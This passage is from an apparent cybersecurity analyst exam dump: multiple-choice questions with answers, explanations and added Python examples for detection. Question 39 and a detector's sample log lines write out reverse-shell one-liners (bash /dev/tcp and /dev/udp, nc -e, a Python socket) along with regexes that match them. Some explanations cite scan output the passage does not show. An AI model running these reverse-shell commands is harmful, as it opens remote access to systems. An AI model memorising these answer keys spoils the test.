Official Reference: https://www.eccouncil.org/cybersecurity-exchange/threat-intelligence/cyber-kill-chain-seven-steps-cyberattack

QUESTION 30
Due to reports of unauthorized activity that was occurring on the internal network, an analyst is performing
a network discovery. The analyst runs an Nmap scan against a corporate network to evaluate which
devices were operating in the environment. Given the following output:

Which of the following choices should the analyst look at first?

A. wh4dc-748gy.lan (192.168.86.152)
B. lan (192.168.86.22)
C. imaging.lan (192.168.86.150)
D. xlaptop.lan (192.168.86.249)
E. p4wnp1_aloa.lan (192.168.86.56)

Correct Answer: E
Explanation

Explanation/Reference:
The analyst should look at p4wnp1_aloa.lan (192.168.86.56) first, as this is the most suspicious device on
the network. P4wnP1 ALOA is a tool that can be used to create a malicious USB device that can perform
various attacks, such as keystroke injection, network sniffing, man-in-the-middle, or backdoor creation. The
presence of a device with this name on the network could indicate that an attacker has plugged in a
malicious USB device to a system and gained access to the network.
Official Reference: https://github.com/mame82/P4wnP1_aloa

QUESTION 31
When starting an investigation, which of the following must be done first?

A. Notify law enforcement
B. Secure the scene
C. Seize all related evidence
D. Interview the witnesses

Correct Answer: B
Explanation

Explanation/Reference:
The first thing that must be done when starting an investigation is to secure the scene. Securing the scene
involves isolating and protecting the area where the incident occurred, as well as any potential evidence or
witnesses. Securing the scene can help prevent any tampering, contamination, or destruction of evidence,
as well as any interference or obstruction of the investigation.

QUESTION 32
Which of the following describes how a CSIRT lead determines who should be communicated with and
when during a security incident?

A. The lead should review what is documented in the incident response policy or plan
B. Management level members of the CSIRT should make that decision
C. The lead has the authority to decide who to communicate with at any time
D. Subject matter experts on the team should communicate with others within the specified area of
expertise

Correct Answer: A
Explanation

Explanation/Reference:
The incident response policy or plan is a document that defines the roles and responsibilities, procedures
and processes, communication and escalation protocols, and reporting and documentation requirements
for handling security incidents. The lead should review what is documented in the incident response policy
or plan to determine who should be communicated with and when during a security incident, as well as
what information should be shared and how. The incident response policy or plan should also be aligned
with the organizational policies and legal obligations regarding incident notification and disclosure.

QUESTION 33
A new cybersecurity analyst is tasked with creating an executive briefing on possible threats to the
organization. Which of the following will produce the data needed for the briefing?

A. Firewall logs
B. Indicators of compromise
C. Risk assessment
D. Access control lists

Correct Answer: B
Explanation

Explanation/Reference:
Indicators of compromise (IoCs) are pieces of data or evidence that suggest a system or network has been
compromised by an attacker or malware. IoCs can include IP addresses, domain names, URLs, file
hashes, registry keys, network traffic patterns, user behaviors, or system anomalies. IoCs can be used to
detect, analyze, and respond to security incidents, as well as to share threat intelligence with other
organizations or authorities. IoCs can produce the data needed for an executive briefing on possible
threats to the organization, as they can provide information on the source, nature, scope, impact, and
mitigation of the threats.

QUESTION 34
An analyst notices there is an internal device sending HTTPS traffic with additional characters in the
header to a known-malicious IP in another country. Which of the following describes what the analyst has
noticed?
A. Beaconing
B. Cross-site scripting
C. Buffer overflow
D. PHP traversal

Correct Answer: A
Explanation

QUESTION 35
A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a
potentially compromised machine. The analyst sets the following display filter: ftp. The analyst can see
there are several RETR requests with 226 Transfer complete responses, but the packet list pane is not
showing the packets containing the file transfer itself. Which of the following can the analyst perform to see
the entire contents of the downloaded files?

A. Change the display filter to ftp.active.port
B. Change the display filter to tcp.port==20
C. Change the display filter to ftp-data and follow the TCP streams
D. Navigate to the File menu and select FTP from the Export objects option

Correct Answer: C
Explanation

Explanation/Reference:
The best way to see the entire contents of the downloaded files in Wireshark is to change the display filter
to ftp-data and follow the TCP streams. FTP separates the control connection (TCP port 21, which carries
the RETR requests and 226 responses the analyst already sees) from the data connection that carries the file
bytes. In active mode the server opens the data connection from TCP port 20; in passive mode the client
connects to an ephemeral port that the server announces in its 227 response, so a filter on port 20 alone
misses passive-mode transfers. The ftp-data dissector matches the data connection in either mode, and
following the TCP stream reassembles the file data that was transferred during the FTP session.
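Added example (not part of the original page): a Python parser for the FTP control channel that works out,
for each RETR, which address and port carried the file and the Wireshark display filter that isolates that
stream. The control-channel lines are constructed; the port arithmetic (p1*256 + p2) is the one FTP's PORT
command and 227 response use.

```python
import re

# Constructed FTP control-channel excerpt (client ">" / server "<"); it is not the
# packet capture from the original question.
CONTROL_CHANNEL = """\
< 220 (vsFTPd 3.0.3)
> USER anonymous
< 331 Please specify the password.
> PASS guest@
< 230 Login successful.
> PORT 192,168,1,50,4,210
< 200 PORT command successful.
> RETR report.pdf
< 150 Opening BINARY mode data connection for report.pdf (48213 bytes).
< 226 Transfer complete.
> PASV
< 227 Entering Passive Mode (10,0,0,5,195,80).
> RETR secrets.zip
< 150 Opening BINARY mode data connection.
< 226 Transfer complete.
"""

PORT_RE = re.compile(r"^> PORT (\d+),(\d+),(\d+),(\d+),(\d+),(\d+)")
PASV_RE = re.compile(r"^< 227 .*?\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")
RETR_RE = re.compile(r"^> RETR (\S+)")


def _endpoint(groups):
    """Turn FTP's six comma-separated numbers into (ip, port); port = p1*256 + p2."""
    ip = ".".join(groups[:4])
    port = int(groups[4]) * 256 + int(groups[5])
    return ip, port


def data_channels(control_text):
    """Map each RETR to the data-channel endpoint announced just before it.

    Active mode (client PORT): the server connects from port 20 to the client's
    announced port. Passive mode (server 227): the client connects to the server's
    announced ephemeral port, so 'tcp.port==20' never matches those packets.
    """
    mode, endpoint, transfers = None, None, []
    for line in control_text.splitlines():
        m = PORT_RE.match(line)
        if m:
            mode, endpoint = "active", _endpoint(m.groups())
            continue
        m = PASV_RE.match(line)
        if m:
            mode, endpoint = "passive", _endpoint(m.groups())
            continue
        m = RETR_RE.match(line)
        if m and endpoint:
            ip, port = endpoint
            transfers.append({
                "file": m.group(1),
                "mode": mode,
                "ip": ip,
                "port": port,
                # Display filter that isolates this transfer's data stream in Wireshark.
                "filter": f"ip.addr=={ip} && tcp.port=={port}",
            })
    return transfers


if __name__ == "__main__":
    for t in data_channels(CONTROL_CHANNEL):
        print(f"{t['file']:12} {t['mode']:8} {t['ip']}:{t['port']}  ->  {t['filter']}")
```

Paste the generated filter into Wireshark, right-click a matching packet and choose Follow > TCP Stream to
see the raw file bytes; with many transfers, the per-RETR mapping tells you which stream is which file.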

QUESTION 36
A SOC manager receives a phone call from an upset customer. The customer received a vulnerability
report two hours ago: but the report did not have a follow-up remediation response from an analyst. Which
of the following documents should the SOC manager review to ensure the team is meeting the appropriate
contractual obligations for the customer?

A. SLA
B. MOU
C. NDA
D. Limitation of liability

Correct Answer: A
Explanation

Explanation/Reference:
SLA stands for service level agreement, which is a contract or document that defines the expectations and
obligations between a service provider and a customer regarding the quality, availability, performance, or
scope of a service. An SLA may also specify the metrics, penalties, or remedies for measuring or ensuring
compliance with the agreed service levels. An SLA can help the SOC manager review if the team is
meeting the appropriate contractual obligations for the customer, such as response time, resolution time,
reporting frequency, or communication channels.

QUESTION 37
Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish
communication with a successfully exploited target?

A. Command and control
B. Actions on objectives
C. Exploitation
D. Delivery

Correct Answer: A
Explanation

Explanation/Reference:
Command and control (C2) is a phase of the Cyber Kill Chain that involves the adversary attempting to
establish communication with a successfully exploited target. C2 enables the adversary to remotely control
or manipulate the target system or network using various methods, such as malware callbacks, backdoors,
botnets, or covert channels. C2 allows the adversary to maintain persistence, exfiltrate data, execute
commands, deliver payloads, or spread to other systems or networks.

QUESTION 38
A company that has a geographically diverse workforce and dynamic IPs wants to implement a
vulnerability scanning method with reduced network traffic. Which of the following would best meet this
requirement?

A. External
B. Agent-based
C. Non-credentialed
D. Credentialed

Correct Answer: B
Explanation

Explanation/Reference:
Agent-based vulnerability scanning is a method that involves installing software agents on the target
systems or networks that can perform local scans and report the results to a central server or console.
Agent-based vulnerability scanning can reduce network traffic, as the scans are performed locally and only
the results are transmitted over the network. Agent-based vulnerability scanning can also provide more
accurate and up-to-date results, as the agents can scan continuously or on-demand, regardless of the
system or network status or location.

QUESTION 39
A security analyst detects an exploit attempt containing the following command:

sh -i >& /dev/udp/10.1.1.1/4821 0>&1

Which of the following is being attempted?

A. RCE
B. Reverse shell
C. XSS
D. SQL injection

Correct Answer: B
Explanation

Explanation/Reference:
A reverse shell is a type of shell access in which the target system initiates the connection: a malicious
command or program run on the target connects back to the attacker's listener and attaches a shell session
to that connection. Because the connection is outbound from the target, a reverse shell can bypass firewalls
or other security controls that only block incoming connections. In this case, the security analyst has
detected an exploit attempt containing the following command:
sh -i >& /dev/udp/10.1.1.1/4821 0>&1
This command starts an interactive shell (sh -i), redirects its standard output and standard error (>&) to a
UDP socket connected to IP address 10.1.1.1 on port 4821, and points its standard input (0>&1) at the same
socket, so every command the attacker sends over UDP is executed and its output is returned. The /dev/tcp
and /dev/udp paths are pseudo-devices provided by bash rather than files on disk, so the redirection only
works when sh is bash; where sh is dash, the same technique is attempted with bash -i or with a netcat,
Python, or Perl one-liner instead.
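Added example (not part of the original page): Python detection logic that scans constructed
process-execution log lines for reverse-shell command patterns and extracts the remote address and port.
The log lines and the field names host=/uid=/cmd= are assumptions made for the example.

```python
import re

# Constructed process-execution log lines (auditd/EDR style); not real telemetry.
SAMPLE_EVENTS = [
    "host=web01 uid=33 cmd=sh -i >& /dev/udp/10.1.1.1/4821 0>&1",
    "host=web01 uid=33 cmd=bash -i >& /dev/tcp/203.0.113.7/443 0>&1",
    "host=db02 uid=0 cmd=nc -e /bin/sh 198.51.100.9 4444",
    "host=db02 uid=0 cmd=python3 -c import socket,subprocess;s=socket.socket();s.connect(('198.51.100.9',9001))",
    "host=app03 uid=1000 cmd=curl -s https://updates.example.com/health",
    "host=app03 uid=1000 cmd=tar czf /tmp/backup.tgz /var/www",
]

# Each pattern captures the remote IP and port where the syntax exposes them.
REVERSE_SHELL_PATTERNS = [
    # bash pseudo-device redirection, TCP or UDP
    ("bash-devtcp", re.compile(r"/dev/(?:tcp|udp)/(\d{1,3}(?:\.\d{1,3}){3})/(\d{1,5})")),
    # netcat/ncat with -e <program> <host> <port>
    ("netcat-exec", re.compile(r"\bnc(?:at)?\b.*\s-e\s+\S+\s+(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})")),
    # python one-liner: socket.socket() ... connect((host, port))
    ("python-socket", re.compile(r"""socket\.socket\(\).*?connect\(\(['"]([\d.]+)['"],\s*(\d{1,5})\)\)""")),
]
CMD_RE = re.compile(r"cmd=(.*)$")
HOST_RE = re.compile(r"host=(\S+)")


def detect_reverse_shells(events):
    """Return one finding per matching event: (host, technique, remote_ip, remote_port)."""
    findings = []
    for ev in events:
        m = CMD_RE.search(ev)
        if not m:
            continue
        cmd = m.group(1)
        for name, pattern in REVERSE_SHELL_PATTERNS:
            hit = pattern.search(cmd)
            if hit:
                host = HOST_RE.search(ev).group(1)
                findings.append((host, name, hit.group(1), int(hit.group(2))))
                break  # one technique label per command line is enough for triage
    return findings


if __name__ == "__main__":
    for host, technique, ip, port in detect_reverse_shells(SAMPLE_EVENTS):
        print(f"{host}: {technique} -> {ip}:{port}")
```

The extracted address and port are what you pivot on next: search firewall and NetFlow data for the same
destination to find the listener and any other hosts that connected to it.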

QUESTION 40
An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available
exploit being used to deliver ransomware. Which of the following factors would an analyst most likely
communicate as the reason for this escalation?

A. Scope
B. Weaponization
C. CVSS
D. Asset value

Correct Answer: B
Explanation

Explanation/Reference:
Weaponization is a factor that describes how an adversary develops or acquires an exploit or payload that
can take advantage of a vulnerability and deliver a malicious effect. Weaponization can increase the
severity or impact of a vulnerability, as it makes it easier or more likely for an attacker to exploit it
successfully and cause damage or harm. Weaponization can also indicate the level of sophistication or
motivation of an attacker, as well as the availability or popularity of an exploit or payload in the cyber threat
landscape. In this case, an older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to
a widely available exploit being used to deliver ransomware. This indicates that weaponization was the
reason for this escalation.

QUESTION 41
An analyst is reviewing a vulnerability report for a server environment with the following entries:
Which of the following systems should be prioritized for patching first?

A. 10.101.27.98
B. 54.73.225.17
C. 54.74.110.26
D. 54.74.110.228

Correct Answer: D
Explanation

Explanation/Reference:
The system that should be prioritized for patching first is 54.74.110.228, as it has the highest number and
severity of vulnerabilities among the four systems listed in the vulnerability report. According to the report,
this system has 12 vulnerabilities, with 8 critical, 3 high, and 1 medium severity ratings. The critical
vulnerabilities include CVE-2019-0708 (BlueKeep), CVE-2019-1182 (DejaBlue), CVE-2017-0144
(EternalBlue), and CVE-2017-0145 (EternalRomance), which are all remote code execution vulnerabilities
that can allow an attacker to compromise the system without any user interaction or authentication. These
vulnerabilities pose a high risk to the system and should be patched as soon as possible.

QUESTION 42
A company is in the process of implementing a vulnerability management program, and there are concerns
about granting the security team access to sensitive data. Which of the following scanning methods can be
implemented to reduce the access to systems while providing the most accurate vulnerability scan results?

A. Credentialed network scanning
B. Passive scanning
C. Agent-based scanning
D. Dynamic scanning

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 43
A security analyst is trying to identify anomalies on the network routing. Which of the following functions
can the analyst use on a shell script to achieve the objective most accurately?

A. function x() { info=$(geoiplookup $1) && echo "$1 | $info"; }
B. function x() { info=$(ping -c 1 $1) && echo "$1 | $info"; }
C. function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" '{print $1}').origin.asn.cymru.com TXT +short) && echo "$1 | $info"; }
D. function x() { info=$(traceroute $1) && echo "$1 | $info"; }

Correct Answer: C
Explanation

Explanation/Reference:
The function that identifies anomalies on the network routing most accurately is option C:
function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" '{print $1}').origin.asn.cymru.com TXT +short) && echo "$1 | $info"; }
This function takes an IP address as an argument and performs two DNS lookups with dig. The inner dig -x
performs a reverse lookup, and the name it queries is the address with its octets reversed under
in-addr.arpa (for 192.0.2.5 that is 5.2.0.192.in-addr.arpa); grep PTR and tail -n 1 keep the last PTR line,
and awk cuts that name at ".in-addr", leaving just the reversed octets 5.2.0.192. The outer dig appends
.origin.asn.cymru.com and queries the TXT record, which Team Cymru's IP-to-ASN service answers in the form
"ASN | BGP prefix | country | registry | allocation date". The function then prints the IP address next to
that ASN information; an address whose origin ASN or prefix differs from what is expected for the company's
networks points to a routing anomaly. One caveat: if no PTR record exists, the last matching line is the
question-section line, which begins with a semicolon, so the outer lookup fails and the function prints
nothing for that address. The other options return geolocation, reachability, or path information, none of
which states which autonomous system announces the address.

QUESTION 44
There are several reports of sensitive information being disclosed via file sharing services. The company
would like to improve its security posture against this threat. Which of the following security controls would
best support the company in this scenario?

A. Implement step-up authentication for administrators
B. Improve employee training and awareness
C. Increase password complexity standards
D. Deploy mobile device management

Correct Answer: B
Explanation

Explanation/Reference:
The best security control to implement against sensitive information being disclosed via file sharing
services is to improve employee training and awareness. Employee training and awareness can help
educate employees on the risks and consequences of using file sharing services for sensitive information,
as well as the policies and procedures for handling such information securely and appropriately. Employee
training and awareness can also help foster a security culture and encourage employees to report any
incidents or violations of information security.

QUESTION 45
Which of the following is the best way to begin preparation for a report titled "What We Learned" regarding
a recent incident involving a cybersecurity breach?

A. Determine the sophistication of the audience that the report is meant for
B. Include references and sources of information on the first page
C. Include a table of contents outlining the entire report
D. Decide on the color scheme that will effectively communicate the metrics

Correct Answer: A
Explanation

Explanation/Reference:
The best way to begin preparation for a report titled "What We Learned" regarding a recent incident
involving a cybersecurity breach is to determine the sophistication of the audience that the report is meant
for. The sophistication of the audience refers to their level of technical knowledge, understanding, or
interest in cybersecurity topics. Determining the sophistication of the audience can help tailor the report
content, language, tone, and format to suit their needs and expectations. For example, a report for executive
management may be more concise, high-level, and business-oriented than a report for technical staff or peers.

QUESTION 46
A security analyst is performing an investigation involving multiple targeted Windows malware binaries.
The analyst wants to gather intelligence without disclosing information to the attackers. Which of the
following actions would allow the analyst to achieve the objective?

A. Upload the binary to an air-gapped sandbox for analysis
B. Send the binaries to the antivirus vendor
C. Execute the binaries on an environment with internet connectivity
D. Query the file hashes using VirusTotal

Correct Answer: A
Explanation

Explanation/Reference:
The best action that would allow the analyst to gather intelligence without disclosing information to the
attackers is to upload the binary to an air-gapped sandbox for analysis. An air-gapped sandbox is an
isolated environment that has no connection to any external network or system. Analyzing the binary there
prevents any communication between the binary and the attackers, as well as any harm or infection to other
systems or networks, while still allowing the analyst to safely observe the behavior, functionality, and
characteristics of the binary. The other options leak information: executing the binaries with internet
connectivity lets them call home, and submitting the samples to an antivirus vendor or querying their hashes
on VirusTotal makes them visible to anyone who watches those services for their own samples, which tells
the attackers their campaign has been discovered.

QUESTION 47
Which of the following would help to minimize human engagement and aid in process improvement in
security operations?

A. OSSTMM
B. SIEM
C. SOAR
D. OWASP

Correct Answer: C
Explanation

Explanation/Reference:
SOAR stands for security orchestration, automation, and response, which is a term that describes a set of
tools, technologies, or platforms that can help streamline, standardize, and automate security operations
and incident response processes and tasks. SOAR can help minimize human engagement and aid in
process improvement in security operations by reducing manual work, human errors, response time, or
complexity. SOAR can also help enhance collaboration, coordination, efficiency, or effectiveness of
security operations and incident response teams.

QUESTION 48
After conducting a cybersecurity risk assessment for a new software request, a Chief Information Security
Officer (CISO) decided the risk score would be too high. The CISO refused the software request. Which of
the following risk management principles did the CISO select?

A. Avoid
B. Transfer
C. Accept
D. Mitigate

Correct Answer: A
Explanation

Explanation/Reference:
Avoid is a risk management principle that describes the decision or action of not engaging in an activity or
accepting a risk that is deemed too high or unacceptable. Avoiding a risk can eliminate the possibility or
impact of the risk, as well as the need for any further risk management actions. In this case, the CISO
decided the risk score would be too high and refused the software request. This indicates that the CISO
selected the avoid principle for risk management.

QUESTION 49
Which of the following is an important aspect that should be included in the lessons-learned step after an
incident?

A. Identify any improvements or changes in the incident response plan or procedures
B. Determine if an internal mistake was made and who did it so they do not repeat the error
C. Present all legal evidence collected and turn it over to law enforcement
D. Discuss the financial impact of the incident to determine if security controls are well spent

Correct Answer: A
Explanation

Explanation/Reference:
An important aspect that should be included in the lessons-learned step after an incident is to identify any
improvements or changes in the incident response plan or procedures. The lessons-learned step is a
process that involves reviewing and evaluating the incident response activities and outcomes, as well as
identifying and documenting any strengths, weaknesses, gaps, or best practices. Identifying any
improvements or changes in the incident response plan or procedures can help enhance the security
posture, readiness, or capability of the organization for future incidents.

QUESTION 50
The security operations team is required to consolidate several threat intelligence feeds due to redundant
tools and portals. Which of the following will best achieve the goal and maximize results?

A. Single pane of glass
B. Single sign-on
C. Data enrichment
D. Deduplication

Correct Answer: D
Explanation

Explanation/Reference:
Deduplication is a process that involves removing any duplicate or redundant data or information from a
data set or source. Deduplication can help consolidate several threat intelligence feeds by eliminating any
overlapping or repeated indicators of compromise (IoCs), alerts, reports, or recommendations.
Deduplication can also help reduce the volume and complexity of threat intelligence data, as well as
improve its quality, accuracy, or relevance.
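Added example (not from the original page): Python that consolidates several threat intelligence feeds by
refanging and normalizing each indicator before deduplicating, while keeping track of which feeds reported
it. Feed contents are constructed from documentation addresses and the EICAR test-file hash; the feed names
are assumptions.

```python
import re

# Constructed feed contents: documentation addresses (RFC 5737) and the EICAR
# test-file MD5; none of these are real indicators of compromise.
FEEDS = {
    "feed_a": ["evil.example.com", "hxxp://bad.example.net/payload.bin", "198.51.100.23",
               "44d88612fea8a8f36de82e1278abb02f"],
    "feed_b": ["EVIL.EXAMPLE.COM", "bad[.]example[.]net", "198.51.100.23",
               "44D88612FEA8A8F36DE82E1278ABB02F"],
    "feed_c": ["http://bad.example.net/payload.bin", "203.0.113.9"],
}

IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
HASH_RE = re.compile(r"^[0-9a-f]{32}$|^[0-9a-f]{40}$|^[0-9a-f]{64}$")  # md5 / sha1 / sha256


def normalize(raw):
    """Refang and canonicalize one indicator; returns (type, value).

    Feeds defang indicators differently (hxxp, [.], upper-case hashes), so the same
    indicator would otherwise survive deduplication several times over.
    """
    v = raw.strip().lower()
    v = v.replace("[.]", ".").replace("(.)", ".").replace("hxxp", "http")
    if IPV4_RE.match(v):
        return "ipv4", v
    if HASH_RE.match(v):
        return "hash", v
    if "://" in v:
        return "url", v
    return "domain", v.rstrip(".")


def consolidate(feeds):
    """Merge feeds into one dict keyed by (type, value) -> sorted list of reporting feeds."""
    merged = {}
    for feed_name, indicators in feeds.items():
        for raw in indicators:
            merged.setdefault(normalize(raw), set()).add(feed_name)
    return {k: sorted(v) for k, v in merged.items()}


def stats(feeds):
    """How much the consolidation removed: raw count vs. unique normalized indicators."""
    raw_count = sum(len(v) for v in feeds.values())
    unique = len(consolidate(feeds))
    return {"raw": raw_count, "unique": unique, "removed": raw_count - unique}


if __name__ == "__main__":
    for (kind, value), sources in sorted(consolidate(FEEDS).items()):
        print(f"{kind:7} {value:40} {','.join(sources)}")
    print(stats(FEEDS))
```

Note that the domain bad.example.net and the URL on it stay separate entries: they are different indicator
types with different detection uses, and collapsing them would lose the URL's path. The list of reporting
feeds per indicator is what lets you see which feeds only ever repeat the others, which is the input for
retiring redundant tools.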

QUESTION 51
Which of the following would a security analyst most likely use to compare TTPs between different known
adversaries of an organization?

A. MITRE ATT&CK
B. Cyber Kill Chain
C. OWASP
D. STIX/TAXII

Correct Answer: A
Explanation

Explanation/Reference:
MITRE ATT&CK is a framework and knowledge base that describes the tactics, techniques, and
procedures (TTPs) used by various adversaries in cyberattacks. MITRE ATT&CK can help security
analysts compare TTPs between different known adversaries of an organization, as well as identify
patterns, gaps, or trends in adversary behavior. MITRE ATT&CK can also help security analysts improve
threat detection, analysis, and response capabilities, as well as share threat intelligence with other
organizations or communities

QUESTION 52
An analyst is remediating items associated with a recent incident. The analyst has isolated the vulnerability
and is actively removing it from the system. Which of the following steps of the process does this describe?

A. Eradication
B. Recovery
C. Containment
D. Preparation

Correct Answer: A
Explanation

Explanation/Reference:
Eradication is a step in the incident response process that involves removing any traces or remnants of the
incident from the affected systems or networks, such as malware, backdoors, compromised accounts, or
malicious files. Eradication also involves restoring the systems or networks to their normal or secure state,
as well as verifying that the incident is completely eliminated and cannot recur. In this case, the analyst is
remediating items associated with a recent incident by isolating the vulnerability and actively removing it
from the system. This describes the eradication step of the incident response process.

QUESTION 53
Joe, a leading sales person at an organization, has announced on social media that he is leaving his
current role to start a new company that will compete with his current employer. Joe is soliciting his current
employer's customers. However, Joe has not resigned or discussed this with his current supervisor yet.
Which of the following would be the best action for the incident response team to recommend?

A. Isolate Joe's PC from the network
B. Reimage the PC based on standard operating procedures
C. Initiate a remote wipe of Joe's PC using mobile device management
D. Perform no action until HR or legal counsel advises on next steps

Correct Answer: D
Explanation

Explanation/Reference:
The best action for the incident response team to recommend in this scenario is to perform no action until
HR or legal counsel advises on next steps. This avoids potential legal or ethical issues, such as violating
employee privacy rights, contractual obligations, or organizational policies. It also helps ensure that any
evidence or information collected from Joe's PC is preserved and handled in a way that will hold up in the
event of any legal action or dispute, which isolating, reimaging, or wiping the PC on the team's own
initiative could undermine.

QUESTION 54
The Chief Information Security Officer is directing a new program to reduce attack surface risks and
threats as part of a zero trust approach. The IT security team is required to come up with priorities for the
program. Which of the following is the best priority based on common attack frameworks?

A. Reduce the administrator and privileged access accounts
B. Employ a network-based IDS
C. Conduct thorough incident response
D. Enable SSO to enterprise applications

Correct Answer: A
Explanation

Explanation/Reference:
The best priority based on common attack frameworks for a new program to reduce attack surface risks
and threats as part of a zero trust approach is to reduce the administrator and privileged access accounts.
Administrator and privileged access accounts are accounts that have elevated permissions or capabilities
to perform sensitive or critical tasks on systems or networks, such as installing software, changing
configurations, accessing data, or granting access. Reducing the administrator and privileged access
accounts can help minimize the attack surface, as it can limit the number of potential targets or entry points
for attackers, as well as reduce the impact or damage of an attack if an account is compromised.

QUESTION 55
During an extended holiday break, a company suffered a security incident. This information was properly
relayed to appropriate personnel in a timely manner and the server was up to date and configured with
appropriate auditing and logging. The Chief Information Security Officer wants to find out precisely what
happened. Which of the following actions should the analyst take first?

A. Clone the virtual server for forensic analysis
B. Log in to the affected server and begin analysis of the logs
C. Restore from the last known-good backup to confirm there was no loss of connectivity
D. Shut down the affected server immediately

Correct Answer: A
Explanation

Explanation/Reference:
The first action that the analyst should take in this case is to clone the virtual server for forensic analysis.
Cloning the virtual server involves creating an exact copy or image of the server's state at a specific point in
time. Cloning the virtual server can help preserve and protect any evidence or information related to the
security incident, as well as prevent any tampering, contamination, or destruction of evidence. Cloning the
virtual server can also allow the analyst to safely analyze and investigate the incident without affecting the
original server or its operations. Logging in to the affected server first would change its state (new log
entries, modified timestamps, cached credentials) before a copy exists, restoring from backup would destroy
the evidence, and shutting the server down would lose volatile data such as memory contents and running
processes.

QUESTION 56
A systems administrator is reviewing after-hours traffic flows from data-center servers and sees regular
outgoing HTTPS connections from one of the servers to a public IP address. The server should not be
making outgoing connections after hours. Looking closer, the administrator sees this traffic pattern around
the clock during work hours as well. Which of the following is the most likely explanation?

A. C2 beaconing activity
B. Data exfiltration
C. Anomalous activity on unexpected ports
D. Network host IP address scanning
E. A rogue network device

Correct Answer: A
Explanation

Explanation/Reference:
The most likely explanation for this traffic pattern is C2 beaconing activity. C2 stands for command and
control, which is a phase of the Cyber Kill Chain that involves the adversary attempting to establish
communication with a successfully exploited target. C2 beaconing activity is network traffic in which a
compromised system sends periodic messages or signals to an attacker-controlled server, usually over
common outbound protocols such as HTTP(S), DNS, ICMP, or UDP so that it blends in with legitimate
traffic. The regularity of the connections, continuing around the clock regardless of business hours, is
what distinguishes a beacon from a user-driven session. C2 beaconing activity can enable the attacker to
remotely control or manipulate the target system or network using various methods, such as malware
callbacks, backdoors, botnets, or covert channels.
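Added example (not from the original page): Python that detects C2 beaconing in connection records by
measuring how regular the inter-connection intervals are for each source/destination pair. The flow records
are constructed; the thresholds (at least six connections, coefficient of variation at or below 0.1) are
assumptions to tune against your own traffic.

```python
from collections import defaultdict
from statistics import mean, pstdev

# Constructed flow records (epoch seconds, src, dst, dst_port); not real traffic.
# srv-db01 reaches 203.0.113.10:443 every ~300 s with a few seconds of jitter,
# srv-web02 makes irregular user-driven connections, srv-app03 connects only twice.
BASE = 1_700_000_000
JITTER = [0, 3, -2, 5, 1, -4, 2, 0, 3, -1, 4, -3]
FLOWS = (
    [(BASE + 300 * i + j, "srv-db01", "203.0.113.10", 443) for i, j in enumerate(JITTER)]
    + [(BASE + t, "srv-web02", "198.51.100.77", 443) for t in (5, 40, 900, 1100, 1105, 2600, 4000)]
    + [(BASE + t, "srv-app03", "203.0.113.10", 443) for t in (10, 20)]
)


def beacon_candidates(flows, min_conns=6, max_cv=0.1):
    """Flag (src, dst, port) pairs whose inter-connection intervals are nearly constant.

    cv = stdev / mean of the intervals. A low cv means a clock-like cadence, which is
    what malware callbacks look like even when the period itself is unknown. Pairs
    with fewer than min_conns connections are skipped: a handful of connections
    cannot establish a period.
    """
    by_pair = defaultdict(list)
    for ts, src, dst, port in flows:
        by_pair[(src, dst, port)].append(ts)

    results = []
    for (src, dst, port), stamps in by_pair.items():
        if len(stamps) < min_conns:
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        period = mean(gaps)
        cv = pstdev(gaps) / period if period else float("inf")
        if cv <= max_cv:
            results.append({"src": src, "dst": dst, "port": port,
                            "connections": len(stamps),
                            "period_s": round(period, 1), "cv": round(cv, 3)})
    return results


if __name__ == "__main__":
    for r in beacon_candidates(FLOWS):
        print(f"{r['src']} -> {r['dst']}:{r['port']} every {r['period_s']}s "
              f"(cv={r['cv']}, n={r['connections']})")
```

Sophisticated implants add deliberate jitter, so raise max_cv (or compare against a per-host baseline)
rather than trusting a single threshold; legitimate schedulers (NTP, update checks) also beacon, which is
why the destination's reputation and the process behind the socket decide the verdict.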

QUESTION 57
New employees in an organization have been consistently plugging in personal webcams despite the
company policy prohibiting use of personal devices. The SOC manager discovers that new employees are
not aware of the company policy. Which of the following will the SOC manager most likely recommend to
help ensure new employees are accountable for following the company policy?

A. Human resources must email a copy of a user agreement to all new employees
B. Supervisors must get verbal confirmation from new employees indicating they have read the user
agreement
C. All new employees must take a test about the company security policy during the onboarding process
D. All new employees must sign a user agreement to acknowledge the company security policy

Correct Answer: D
Explanation

Explanation/Reference:
The best action that the SOC manager can recommend to help ensure new employees are accountable for
following the company policy is to require all new employees to sign a user agreement to acknowledge the
company security policy. A user agreement is a document that defines the rights and responsibilities of the
users regarding the organization's systems, networks, or resources, as well as the consequences of violating
the policy. Signing a user agreement can help ensure new employees are aware of and agree to comply with
the company security policy, as well as hold them accountable for any breaches or incidents caused by their
actions or inactions.

QUESTION 58
An analyst has been asked to validate the potential risk of a new ransomware campaign that the Chief
Financial Officer read about in the newspaper. The company is a manufacturer of a very small spring used
in the newest fighter jet and is a critical piece of the supply chain for this aircraft. Which of the following
would be the best threat intelligence source to learn about this new campaign?

A. Information sharing organization
B. Blogs/forums
C. Cybersecurity incident response team
D. Deep/dark web

Correct Answer: A
Explanation

Explanation/Reference:
An information sharing organization is a group or network of organizations that share threat intelligence,
best practices, or lessons learned related to cybersecurity issues or incidents. An information sharing
organization can help security analysts learn about new ransomware campaigns or other emerging threats,
as well as get recommendations or guidance on how to prevent, detect, or respond to them. An information
sharing organization can also help security analysts collaborate or coordinate with other organizations in
the same industry or region that may face similar threats or challenges.

QUESTION 59
An incident response team finished responding to a significant security incident. The management team
has asked the lead analyst to provide an after-action report that includes lessons learned. Which of the
following is the most likely reason to include lessons learned?

A. To satisfy regulatory requirements for incident reporting
B. To hold other departments accountable
C. To identify areas of improvement in the incident response process
D. To highlight the notable practices of the organization's incident response team

Correct Answer: C
Explanation

Explanation/Reference:
The most likely reason to include lessons learned in an after-action report is to identify areas of
improvement in the incident response process. The lessons learned process is a way of reviewing and
evaluating the incident response activities and outcomes, as well as identifying and documenting any
